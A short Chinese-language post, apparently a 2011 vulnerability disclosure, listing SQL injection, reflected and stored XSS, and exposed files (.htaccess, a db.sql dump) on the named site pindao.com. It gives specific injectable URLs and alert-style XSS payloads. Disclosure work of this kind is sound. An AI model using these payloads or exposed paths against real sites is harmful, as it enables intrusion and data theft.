品导网多个漏洞

作者：hack1990 时间：11-11-02 阅读数：696人阅读

1.高危SQL Injection root

http://pai.pindao.com/match/api/share/?id=537

2.Cross Site Scripting

post

email=”><script>alert(/xss/)</script>

3.多處Cross Site Scripting PHP_SELF

http://go.pindao.com/search_1_0_0_%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E

http://trust.pindao.com/trust/index/detail/trustid/1/%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

http://pai.pindao.com/hercloset/358232/2154/1/0/0/%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

4.Cross Site Scripting onmouseover

http://www.pindao.com/cms/motor/artselect/keyword/%22%20onmouseover=alert%28123456%29%20bad=%22/t/1/page/1/timeera/0

5.Store Cross Site Scripting

登入后会员基本信息内多个parameter未进行过滤

http://trust.pindao.com/.htaccess

7.SQL Leakage

http://tuan.pindao.com/db.sql

Leakage

http://tuan.pindao.com/manage/login.php

http://help.pindao.com/user/account/login

http://i.pindao.com/user/account/login

相关文章